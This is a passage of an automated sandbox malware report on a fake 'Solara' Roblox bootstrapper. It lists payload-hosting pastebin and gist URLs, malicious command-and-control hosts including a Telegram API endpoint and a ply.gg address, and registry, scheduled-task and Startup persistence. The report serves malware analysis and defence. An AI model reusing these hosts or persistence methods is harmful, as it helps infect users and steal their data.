                                    https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6C4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://www.nuget.org/packages/Newtonsoft.Json.Bson8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000005.00000002.2102713604.000001D465941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2167165138.0000020025F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2290083728.000001DA64C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2442020848.00000201ACB01000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://nodejs.orgBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://clientsettings.roblox.comBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://pastebin.comBootstrapper.exe, 00000003.00000002.2134494144.00000247BF4BA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                      https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msiBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6BC000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E669000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://pastebin.comBootstrapper.exe, 00000003.00000002.2134494144.00000247BF4BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://pastebin.com/raw/pjseRvyKBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E64E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://clientsettings.roblox.comBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.cBootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                149.154.167.220
                                                		api.telegram.orgUnited Kingdom
                                                		62041TELEGRAMRUtrue
                                                172.67.19.24
                                                		pastebin.comUnited States
                                                		13335CLOUDFLARENETUStrue
                                                147.185.221.23
                                                		cash-hispanic.gl.at.ply.ggUnited States
                                                		12087SALSGIVERUStrue
                                                104.21.93.27
                                                		getsolara.devUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                172.66.44.59
                                                		79c62fd6.solaraweb-alj.pages.devUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                128.116.44.3
                                                		edge-term4-fra4.roblox.comUnited States
                                                		22697ROBLOX-PRODUCTIONUSfalse
                                                104.20.23.46
                                                		www.nodejs.orgUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                Private

                                                IP
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1532623
                                                Start date and time:2024-10-13 19:08:06 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 14m 48s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:49
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Sample name:8svMXMXNRn.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:4960838a390adf1ea412850ca14f15ce7c201fa967c0089df97742ee517ed0fe.exe
                                                Detection:MAL
                                                Classification:mal100.rans.troj.spyw.evad.winEXE@49/237@9/8
                                                EGA Information:
                                                • Successful, ratio: 29.4%
                                                HCA Information:
                                                • Successful, ratio: 93%
                                                • Number of executed functions: 167
                                                • Number of non-executed functions: 94
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 104.208.16.94, 184.28.90.27, 88.221.168.8
                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e87.dspb.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, settings-ssl.xboxlive.com.edgekey.net, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                • Execution Graph export aborted for target Bootstrapper.exe, PID 2860 because it is empty
                                                • Execution Graph export aborted for target BootstrapperV1.22.exe, PID 7376 because it is empty
                                                • Execution Graph export aborted for target explorer.exe, PID 1356 because it is empty
                                                • Execution Graph export aborted for target explorer.exe, PID 5344 because it is empty
                                                • Execution Graph export aborted for target explorer.exe, PID 7320 because it is empty
                                                • Execution Graph export aborted for target explorer.exe, PID 7444 because it is empty
                                                • Execution Graph export aborted for target explorer.exe, PID 8052 because it is empty
                                                • Execution Graph export aborted for target explorer.exe, PID 8112 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 1848 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7224 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 8096 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size exceeded maximum capacity and may have missing network information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtDeleteKey calls found.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                13:09:00API Interceptor45x Sleep call for process: Bootstrapper.exe modified
                                                13:09:01API Interceptor53x Sleep call for process: powershell.exe modified
                                                13:09:07API Interceptor51x Sleep call for process: BootstrapperV1.22.exe modified
                                                13:09:43API Interceptor1x Sleep call for process: WerFault.exe modified
                                                13:10:00API Interceptor3008561x Sleep call for process: BootstrapperV21.exe modified
                                                13:11:33API Interceptor2x Sleep call for process: svchost.exe modified
                                                13:12:09API Interceptor483x Sleep call for process: Music.UI.exe modified
                                                19:10:00Task SchedulerRun new task: explorer path: C:\Users\user\AppData\Roaming\explorer.exe
                                                19:10:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer C:\Users\user\AppData\Roaming\explorer.exe
                                                19:10:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer C:\Users\user\AppData\Roaming\explorer.exe
                                                19:10:18AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                149.154.167.220sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                  1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292Get hashmaliciousUnknownBrowse
                                                        SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                          SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                            d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  FDST69876500900.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    172.67.19.24envifa.vbsGet hashmaliciousUnknownBrowse
                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                    sostener.vbsGet hashmaliciousRemcosBrowse
                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                    147.185.221.237yJsmmW4wS.exeGet hashmaliciousXWormBrowse
                                                                      I8YtUAUWeS.exeGet hashmaliciousXWormBrowse
                                                                        s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                                          W1FREE.exeGet hashmaliciousXWormBrowse
                                                                            x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                                                              H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                  H1N45BQJ8x.exeGet hashmaliciousXWormBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    www.nodejs.orgSecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.22.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.22.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 104.20.23.46
                                                                                    RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 104.20.22.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.22.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    edge-term4-fra4.roblox.comSecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 128.116.44.3
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 128.116.44.3
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 128.116.44.4
                                                                                    SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                                                                    • 128.116.44.3
                                                                                    https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
                                                                                    • 128.116.44.3
                                                                                    https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                                                                    • 128.116.44.3
                                                                                    getsolara.devSecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.93.27
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.203.125
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.203.125
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.93.27
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.93.27
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.93.27
                                                                                    SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.93.27
                                                                                    BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 172.67.203.125
                                                                                    RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 172.67.203.125
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.93.27
                                                                                    nodejs.orgSecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.22.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.22.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 104.20.23.46
                                                                                    RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 104.20.22.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46
                                                                                    SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.22.46
                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.20.23.46

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TELEGRAMRUsB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                    • 149.154.167.220
                                                                                    1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                    • 149.154.167.220
                                                                                    PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    FDST69876500900.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    CLOUDFLARENETUS80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 104.20.4.235
                                                                                    jcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 172.67.19.24
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                    • 172.67.74.152
                                                                                    http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                                                    • 104.16.124.96
                                                                                    https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 172.66.0.235
                                                                                    https://f120987.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.16.124.96
                                                                                    https://japroippouquafou-5881.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.5.15
                                                                                    http://posegulefra-4459.vercel.app/mixcc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.4.15
                                                                                    https://kucoinexplora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.16.124.96
                                                                                    CLOUDFLARENETUS80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 104.20.4.235
                                                                                    jcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 172.67.19.24
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.206.204
                                                                                    http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                    • 172.67.74.152
                                                                                    http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                                                    • 104.16.124.96
                                                                                    https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 172.66.0.235
                                                                                    https://f120987.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.16.124.96
                                                                                    https://japroippouquafou-5881.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.5.15
                                                                                    http://posegulefra-4459.vercel.app/mixcc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.26.4.15
                                                                                    https://kucoinexplora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.16.124.96
                                                                                    SALSGIVERUS7yJsmmW4wS.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.23
                                                                                    I8YtUAUWeS.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.23
                                                                                    s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.23
                                                                                    W1FREE.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.23
                                                                                    dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.22
                                                                                    Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.18
                                                                                    7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.18
                                                                                    432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.22
                                                                                    5q4X9fRo4b.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 147.185.221.17
                                                                                    l18t80u9zg.exeGet hashmaliciousXWormBrowse
                                                                                    • 147.185.221.22

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0e80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    jcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    hvnc-CR-SCR-0710.bin.exeGet hashmaliciousPureCrypterBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    hvnc-CR-SCR-0710.bin.exeGet hashmaliciousPureCrypterBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    https://kucoinexplora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    https://shawri.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    https://server.h74w.com/invite/12536668Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46
                                                                                    https://scary-wave.surge.sh/appeal/Get hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    • 172.67.19.24
                                                                                    • 104.21.93.27
                                                                                    • 172.66.44.59
                                                                                    • 128.116.44.3
                                                                                    • 104.20.23.46

                                                                                    Dropped Files

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\user\AppData\Local\Temp\Bootstrapper.exeRHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                      C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xde048b76, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.6586097059636359
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                        MD5:937BEB8BE9A19C57970F2CA28A9825A0
                                                                                        SHA1:FFF9F6DF851C466BBBB28239D885DD2EB974FFAF
                                                                                        SHA-256:7763224FC7746FBB785F0E59E2A75E110A279AF38A47C77AEE83922F35FAAE54
                                                                                        SHA-512:DE04CCC17FAA15E8D5E4628D749370C9F1067ED59D8E9BD95A1AA5152BE690D7AD5A0D5D6433FE8295211F4398306C303F3DFD21CBB128AF58FADDFC1A82801E
                                                                                        Malicious:false
                                                                                        Preview:...v... ...............X\...;...{......................0.z..........{..!....|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................-l!....|.....................!....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.2_8a67a53847f1550bba47f83cc7f50ab9fda1622_30d98452_79ae1923-2aab-47ba-a2dd-a54311f75107\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.2682454363770883
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:72k7ZfCXir0bU9+dQlaWxejol2/fsLzuiFElZ24lO8w:RfCX9bG+dQlaml23sLzuiFcY4lO8w
                                                                                        MD5:7B52C64EC0648A1C0FB7C56DB0CDEC72
                                                                                        SHA1:76DD8B941FF5BAD2CFF7950220084E92EE3FACCD
                                                                                        SHA-256:4D5C692A9D943DA4A5904DAA889CB272895113261A1613B6BA11399EB042A866
                                                                                        SHA-512:1DFFAD852D10259064C7375A76048158842329FB248DE1B3FED0C47BF39EEEBC8137D1FA0D9AA829A3BB1A8DBA911CACDAC9A8F0248AA94CB5123DEA45CC6861
                                                                                        Malicious:false
